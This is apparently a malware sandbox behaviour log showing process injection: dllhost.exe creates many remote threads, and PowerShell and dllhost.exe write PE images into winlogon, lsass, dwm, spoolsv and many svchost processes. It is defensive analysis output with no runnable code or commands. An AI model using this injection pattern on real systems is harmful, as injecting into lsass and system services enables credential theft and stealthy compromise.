Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6CCC2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 39D92EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FA392EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B7272EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 53B52EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E88A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 77B52EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5D342EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B5E12EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 59992EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 53C22EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 41D42EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: ADAD2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3072EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4DB2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3312EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C5282EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 76AA2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F1B32EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F34B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DE4D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 74472EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A9D02EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AF8C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D8932EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5E932EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 43DC2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 97E32EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DC872EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 698D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 34C52EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 43542EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 84342EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 58922EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B4702EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D8A42EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3D425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3F3B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 87882EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9C962EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2D325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 27025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10C25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 21625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 24525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 23425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 20F25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2BB25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 15D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 26D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BB25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 24325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 58952EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 30425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: ADFC2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DD592EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2EA25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2C125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CB62EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2FB25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E1072EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2B625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8C1D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BB25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BE25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 97FD2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 652E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AA25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A27C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 30C25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 87DA2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 28E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 29F25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 23325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 27525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FB3C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2C925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5672EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C1F32EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2B625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 30025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E3BC2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FE25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 38952EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 24D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2AC25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6E562EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BB25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2B825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1FF72EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F352EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 79572EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E502EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BE25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A462EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2CA25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13112EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2CA25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8C582EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2B125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5F1D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2B125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5E062EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9025AC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: AEC92EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: ED25AC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: DC1B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13025AC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 82532EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2DB25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2EA25AC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\spoolsv.exe EIP: A62EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 27525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 27725AC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 66EB2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A825AC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: FD9A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CEDB2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 42792EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 23A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B6F32EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AB25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8DCD2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2F125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 73832EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 22725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F9DA2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6CCC2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2B025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 39D92EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FA392EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B7272EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 53B52EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9C25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E88A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 77B52EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7C25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5D342EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B5E12EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 59992EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 53C22EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 913B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 41D42EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: ADAD2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3072EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4DB2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F96A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9852EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C5282EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 76AA2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CBA02EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F1B32EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F34B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DE4D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 74472EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A9D02EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AF8C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D8932EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5E932EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 43DC2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 97E32EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DC872EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 69902EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E812EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C08C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 34C52EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 43542EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 84342EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 58922EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B4702EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D8A42EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3D425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3F3B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 87882EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9C962EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2D325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 27025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10C25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 21625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 24525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 23425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 20F25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2BB25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 15D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 26D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BB25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 24325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 30425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2EA25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2C125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2FB25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2B625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BB25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BE25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AA25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 30C25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 28E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 29F25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 23325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 27525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2C925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2B625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 30025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FE25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 24D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2AC25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BB25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2B825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BE25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2CA25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2CA25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2B125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2B125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: ED25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2DB25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2EA25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 27525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 27725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 23A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AB25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2F125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 22725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2B025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9C25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7C25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 913B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F96A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CBA02EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 892EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B42EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D1EA2EBC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 1E858950000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 140ADFC0000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 195DD590000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 1160CD30000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 257E1070000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F28C1D0000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CA97FD0000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2652E0000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 254A27C0000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24B87DA0000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 205FB3C0000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A205670000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18EC1F30000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25CE3BC0000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26238950000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2786E560000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1611FF70000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 27C0F350000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B279570000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E70A460000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22D13110000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22C8C580000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2825F1D0000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AA5D9C0000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 1E858950000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 140ADFC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 195DD590000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 1160CB60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 257E1070000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F28C1D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CA97FD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2652E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 254A27C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24B87DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 205FB3C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A205670000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18EC1F30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25CE3BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26238950000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2786E560000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1611FF70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 27C0F350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B279570000 value starts with: 4D5A
